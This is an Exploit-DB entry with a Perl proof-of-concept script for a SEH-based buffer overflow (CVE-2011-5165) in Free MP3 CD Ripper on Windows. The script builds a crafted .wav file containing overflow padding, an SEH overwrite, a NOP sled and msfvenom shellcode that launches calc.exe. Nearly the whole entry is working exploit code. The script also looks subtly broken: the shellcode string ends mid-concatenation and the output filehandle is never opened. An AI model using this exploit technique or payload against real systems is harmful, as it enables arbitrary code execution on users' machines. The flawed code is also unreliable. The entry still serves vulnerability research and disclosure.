Free MP3 CD Ripper 2.6 2.8 .wav - SEH Based Buffer Overflow

ID EDB-ID:36826
Type exploitdb
Reporter ThreatActor
Modified 2015-04-23T00:00:00


Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow. CVE-2011-5165. Local exploit for windows platform

                                            #!/usr/bin/env perl
# original p0c
# credit to TUNISIAN CYBER
# however he was attemping to vanilla buffer overflow 
# in fact it is SEH based exploit 
# using the address 0x7C9D30D7 is limit the targets
#which I assume belongs to OS file didn't work on win7
#yes he did find a buffer overflow since the offset reaches ESP before SEH
#in this app,  SEH based exploits are more effective and the main vuln in this case should be SEH
#This p0c > win 7s & 8s
# ThreatActor at 

my $file = "p0c.wav";
my $buff = "A" x 4116; # offset to SEH
my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp
my $seh = pack('V', 0x66E42A79); # 66E42A79 5E  POP ESI ogg.dll
my $nop = "\x90" x 28;

#msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'
my $shell = 
"\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" .
"\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" .
"\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" .
"\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" .
"\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" .
"\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" .
"\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" .
"\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" .
"\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" .
"\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" .
"\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" .
"\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" .
"\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" .
"\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" .
"\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" .

print $FILE $buff.$nseh.$seh.$nop.$shell;
print "+++++++++++++++++++\n";